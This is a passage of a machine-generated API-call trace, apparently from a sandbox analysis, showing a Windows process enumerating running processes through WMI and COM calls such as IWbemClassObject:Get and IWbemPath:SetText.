[0265.458] CoTaskMemFree (pv=0x54ba398) [0265.458] IUnknown:AddRef (This=0x553aac8) returned 0x3 [0265.458] IWbemClassObject:Get (in: This=0x553aac8, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.458] IWbemClassObject:Get (in: This=0x553aac8, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4920\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.458] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4920\"") returned 0x5e [0265.458] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4920\"") returned 0x5e [0265.458] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.458] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.458] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.459] IUnknown:Release (This=0x601a94) returned 0x1 [0265.459] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2d8) returned 0x0 [0265.460] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2d8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.460] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2d8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5542660) returned 0x0 [0265.460] WbemDefPath:IUnknown:Release (This=0x54ba2d8) returned 0x0 [0265.460] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542660, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5542660) returned 0x0 [0265.460] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542660, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.460] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542660, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.461] WbemDefPath:IUnknown:AddRef (This=0x5542660) returned 0x3 [0265.461] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542660, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.461] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542660, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.461] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542660, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5537678) returned 0x0 [0265.461] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5537678, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.461] WbemDefPath:IUnknown:Release (This=0x5537678) returned 0x3 [0265.461] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542660, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.461] WbemDefPath:IUnknown:Release (This=0x5542660) returned 0x2 [0265.461] WbemDefPath:IUnknown:Release (This=0x5542660) returned 0x1 [0265.461] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542660, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5542660) returned 0x0 [0265.461] WbemDefPath:IUnknown:AddRef (This=0x5542660) returned 0x3 [0265.461] WbemDefPath:IUnknown:Release (This=0x5542660) returned 0x2 [0265.461] WbemDefPath:IWbemPath:SetText (This=0x5542660, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4920\"") returned 0x0 [0265.461] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.461] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.461] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.461] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.461] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.461] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.461] IWbemClassObject:Get (in: This=0x553aac8, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23ed8e8*=0, plFlavor=0x23ed8ec*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="backgroundTaskHost.exe", varVal2=0x0), pType=0x23ed8e8*=8, plFlavor=0x23ed8ec*=0) returned 0x0 [0265.461] SysStringByteLen (bstr="backgroundTaskHost.exe") returned 0x2c [0265.462] SysStringByteLen (bstr="backgroundTaskHost.exe") returned 0x2c [0265.462] IWbemClassObject:Get (in: This=0x553aac8, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23ed8e8*=8, plFlavor=0x23ed8ec*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="backgroundTaskHost.exe", varVal2=0x0), pType=0x23ed8e8*=8, plFlavor=0x23ed8ec*=0) returned 0x0 [0265.462] SysStringByteLen (bstr="backgroundTaskHost.exe") returned 0x2c [0265.462] SysStringByteLen (bstr="backgroundTaskHost.exe") returned 0x2c [0265.462] CoTaskMemAlloc (cb=0x4) returned 0x54ba398 [0265.462] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba398, puReturned=0x23c1fd0 | out: apObjects=0x54ba398*=0x553a138, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.462] IUnknown:QueryInterface (in: This=0x553a138, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x553a138) returned 0x0 [0265.463] IUnknown:QueryInterface (in: This=0x553a138, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.463] IUnknown:QueryInterface (in: This=0x553a138, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.463] IUnknown:QueryInterface (in: This=0x553a138, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.463] IUnknown:AddRef (This=0x553a138) returned 0x3 [0265.463] IUnknown:QueryInterface (in: This=0x553a138, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.463] IUnknown:QueryInterface (in: This=0x553a138, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.463] IUnknown:QueryInterface (in: This=0x553a138, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x553a13c) returned 0x0 [0265.463] IMarshal:GetUnmarshalClass (in: This=0x553a13c, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.463] IUnknown:Release (This=0x553a13c) returned 0x3 [0265.463] IUnknown:QueryInterface (in: This=0x553a138, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.464] IUnknown:Release (This=0x553a138) returned 0x2 [0265.464] IUnknown:QueryInterface (in: This=0x553a138, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x553a138) returned 0x0 [0265.464] IUnknown:AddRef (This=0x553a138) returned 0x4 [0265.464] IUnknown:Release (This=0x553a138) returned 0x3 [0265.464] IUnknown:Release (This=0x553a138) returned 0x2 [0265.464] CoTaskMemFree (pv=0x54ba398) [0265.464] IUnknown:AddRef (This=0x553a138) returned 0x3 [0265.464] IWbemClassObject:Get (in: This=0x553a138, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.464] IWbemClassObject:Get (in: This=0x553a138, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4996\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.464] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4996\"") returned 0x5e [0265.464] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4996\"") returned 0x5e [0265.464] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.464] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.464] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.464] IUnknown:Release (This=0x601a94) returned 0x1 [0265.465] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba398) returned 0x0 [0265.466] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba398, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.466] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba398, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5542890) returned 0x0 [0265.466] WbemDefPath:IUnknown:Release (This=0x54ba398) returned 0x0 [0265.466] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542890, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5542890) returned 0x0 [0265.466] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542890, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.467] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542890, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.467] WbemDefPath:IUnknown:AddRef (This=0x5542890) returned 0x3 [0265.467] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542890, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.467] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542890, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.467] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542890, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5544210) returned 0x0 [0265.467] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5544210, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.467] WbemDefPath:IUnknown:Release (This=0x5544210) returned 0x3 [0265.467] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542890, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.467] WbemDefPath:IUnknown:Release (This=0x5542890) returned 0x2 [0265.467] WbemDefPath:IUnknown:Release (This=0x5542890) returned 0x1 [0265.467] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542890, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5542890) returned 0x0 [0265.467] WbemDefPath:IUnknown:AddRef (This=0x5542890) returned 0x3 [0265.467] WbemDefPath:IUnknown:Release (This=0x5542890) returned 0x2 [0265.467] WbemDefPath:IWbemPath:SetText (This=0x5542890, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4996\"") returned 0x0 [0265.467] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.467] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.467] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.468] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.468] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.468] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.468] IWbemClassObject:Get (in: This=0x553a138, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23ee1a4*=0, plFlavor=0x23ee1a8*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="backgroundTaskHost.exe", varVal2=0x0), pType=0x23ee1a4*=8, plFlavor=0x23ee1a8*=0) returned 0x0 [0265.468] SysStringByteLen (bstr="backgroundTaskHost.exe") returned 0x2c [0265.468] SysStringByteLen (bstr="backgroundTaskHost.exe") returned 0x2c [0265.468] IWbemClassObject:Get (in: This=0x553a138, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23ee1a4*=8, plFlavor=0x23ee1a8*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="backgroundTaskHost.exe", varVal2=0x0), pType=0x23ee1a4*=8, plFlavor=0x23ee1a8*=0) returned 0x0 [0265.468] SysStringByteLen (bstr="backgroundTaskHost.exe") returned 0x2c [0265.468] CoTaskMemAlloc (cb=0x4) returned 0x54ba2d8 [0265.468] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2d8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2d8*=0x553a468, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.469] IUnknown:QueryInterface (in: This=0x553a468, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x553a468) returned 0x0 [0265.469] IUnknown:QueryInterface (in: This=0x553a468, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.469] IUnknown:QueryInterface (in: This=0x553a468, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.469] IUnknown:AddRef (This=0x553a468) returned 0x3 [0265.469] IUnknown:QueryInterface (in: This=0x553a468, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.469] IUnknown:QueryInterface (in: This=0x553a468, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.469] IUnknown:QueryInterface (in: This=0x553a468, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x553a46c) returned 0x0 [0265.469] IMarshal:GetUnmarshalClass (in: This=0x553a46c, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.469] IUnknown:Release (This=0x553a46c) returned 0x3 [0265.469] IUnknown:Release (This=0x553a468) returned 0x2 [0265.469] IUnknown:AddRef (This=0x553a468) returned 0x4 [0265.470] IUnknown:Release (This=0x553a468) returned 0x3 [0265.470] IUnknown:Release (This=0x553a468) returned 0x2 [0265.470] CoTaskMemFree (pv=0x54ba2d8) [0265.470] IUnknown:AddRef (This=0x553a468) returned 0x3 [0265.470] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, 